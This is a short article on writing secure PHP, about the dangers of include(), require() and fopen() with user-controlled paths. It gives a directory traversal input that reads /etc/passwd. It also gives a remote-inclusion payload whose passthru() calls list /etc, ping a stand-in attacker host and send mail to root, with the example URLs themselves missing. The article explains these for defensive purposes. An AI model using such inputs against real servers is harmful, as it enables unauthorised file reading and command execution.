This article discusses the common threats and challenges of programming secure PHP applications and practical methods for doing so.
The goal of this paper is not only to show common threats and challenges of programming secure PHP applications but also to show you practical methods for doing so. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really conscious about what is going behind the curtains. Security and convenience do not often go hand in hand — but they can.
PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.
On a site I will not mention in this article (because the problem still has not been solved) has one script which includes various HTML files and displays them in the proper layout. Have a look at the following URL:
The variable $i obviously contains the file name to be included. When you see a URL like this, a lot of questions should come to your mind:
* Has the programmer considered directory traversals like i=../../../etc/passwd?
* Does he check for the .html extension?
* Does he use fopen() to include the files?
* Has he thought about not allowing remote files?
In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:
Where exec.html contains a couple of lines of code:
passthru ('ls -al /etc');
passthru ('ping -c 1 evilhaxor.org');
passthru ('echo You have been hax0red | mail root');
I am sure you get the idea. A lot of bad things can be done from here.